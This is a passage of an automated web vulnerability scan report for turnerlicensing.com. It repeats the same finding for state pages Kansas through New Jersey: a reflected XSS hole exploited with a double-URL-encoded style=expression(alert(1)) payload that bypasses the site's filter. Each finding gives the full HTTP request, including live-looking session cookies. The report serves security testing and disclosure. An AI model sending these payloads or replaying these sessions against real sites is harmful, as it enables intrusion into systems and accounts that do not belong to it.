GET /teams_by_state/Iowa?7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.95. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Kansas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4f'style='x:expression(alert(1))'77e22b95d60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Kansas?b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.96. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Kentucky
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7860b'style='x:expression(alert(1))'bb84182b6d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Kentucky?7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.97. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Louisiana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e214f'style='x:expression(alert(1))'8a4ef989e82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Louisiana?e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.98. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Maryland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as baba6'style='x:expression(alert(1))'86c1a467bc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Maryland?baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.99. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Massachusetts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24d7e'style='x:expression(alert(1))'473118b635c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Massachusetts?24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.100. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Michigan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4c53'style='x:expression(alert(1))'cbce184105d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Michigan?c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.101. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Minnesota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84920'style='x:expression(alert(1))'64dd360bb51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Minnesota?84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.102. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Mississippi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fff1'style='x:expression(alert(1))'459cb5a215 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Mississippi?2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.103. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Missouri
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7754c'style='x:expression(alert(1))'27eccdc1792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Missouri?7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.104. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Montana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bcaf'style='x:expression(alert(1))'1afca94aa79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Montana?5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.105. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Montreal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c04c'style='x:expression(alert(1))'d59743044a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Montreal?7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.106. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Nebraska
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e07a'style='x:expression(alert(1))'040901e41e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Nebraska?6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.107. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Nevada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebfbe'style='x:expression(alert(1))'c4304c5bf67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Nevada?ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.108. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/New-Hampshire
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c49'style='x:expression(alert(1))'4d9b5eac50e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Hampshire?89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.109. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/New-Jersey
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ebf4'style='x:expression(alert(1))'1fb26256c52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Jersey?3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
